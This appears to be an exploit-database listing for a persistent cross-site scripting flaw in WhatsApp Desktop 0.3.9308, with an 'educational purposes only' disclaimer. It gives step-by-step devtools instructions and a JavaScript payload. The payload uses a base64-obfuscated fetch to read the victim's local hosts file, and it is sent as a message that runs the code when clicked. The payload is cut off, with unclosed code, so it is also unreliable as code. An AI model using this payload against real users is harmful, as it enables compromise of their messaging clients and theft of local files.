Exploits / Vulnerability Discovered : 2020-04-06 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Whatsapp desktop 0.3.9308 persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308)
// step 2: open devtools and search in all files "t=e.id"
// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found
// step 4: paste "https://example.com" in the text box and hit "Enter"
// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter"
var payload = `(async function() {
(async function() {
// read "file:///C:/windows/system32/drivers/etc/hosts" content
const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'));
const t = await r.text();
// step 6: press F8 in order for the execution to continue
// result: a message should be sent to the victim that once is clicked will execute the payload above
// further information: https://github.com/weizman/CVE-2019-18426